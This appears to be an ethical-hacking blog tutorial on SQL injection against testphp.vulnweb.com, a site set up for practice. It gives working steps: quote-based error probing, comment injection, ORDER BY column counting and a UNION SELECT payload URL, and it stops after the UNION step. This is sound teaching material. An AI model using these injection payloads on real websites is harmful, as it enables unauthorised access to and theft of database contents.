top of page
Programming

How to perform a basic SQL Injection Attack? — Ethical Hacking


How does a SQL Injection attack work?

SQL injection attack is possible when a website exposes inputs to be taken from the user and uses the user input to directly run a query in MySQL. In this blog, I will be demonstrating how to perform a basic SQL Injection Attack on a website, and at the end, I will talk about a tool SQLmap , which automates the entire process.

If you don’t know what SQL Injection Attack is, you can visit this link. https://www.w3schools.com/sql/sql_injection.asp

There’s a website http://testphp.vulnweb.com/listproducts.php?cat=1 which is open for testing php vulnerablities. I will be using this website to perform SQLi attack.


1. Discovering if the website is vulnerable to SQL Injection attacks

The most basic and simple way is to check the URLs of pages you are visiting. If the URL is something of the form http://testphp.vulnweb.com/listproducts.php?cat=1, it is a potential target. To check if the webpage is actually using a SQL backend, you can append \ or a single inverted quote at the end of URL and see if anything in the page breaks or you get an SQL error. For most cases the error is something like this:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''a\'' at line 1

But the error can be anything else as well. For the website http://testphp.vulnweb.com/listproducts.php?cat=1 appending gives me the following screen


So I have established that SQL injection attack is possible on my target http://testphp.vulnweb.com/listproducts.php?cat=1


In the backend, the application might be running a query similar to

SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'

The query executed for http://testphp.vulnweb.com/listproducts.php?cat=1 would be

SELECT * FROM XYZ_TABLE WHERE CAT=1'

And you guessed it right. This will throw an error.

The silver lining to this is now we know we can modify the query in any way we would like to. If I add --+ to the end, the query should run without errors. ( --+ or # will basically comment on anything written after it.This is a handy knowledge, though it may not be useful in this case)


2. Finding out the Databases present

The next step would be to find out the databases present. We make use of the ORDER BY clause here. If I run http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, the corresponding MySQL query would be

SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'

This will sort the results on the basis of the 5th column

I will repeat this process for different values of column numbers until I get a column number for which the page breaks. for eg. in this case when ORDER BY 12, the page breaks. I now know that the total number of columns is 11. Since the number of columns is 11, I will run a query select all 1,2,3,4,5,6,7,8,9,10,11.

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11

The corresponding MySQL query would look like

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11

Now navigate the webpage. In some places, you will find some of the numbers between 1 to 11. I see the numbers 7, 2 and 9.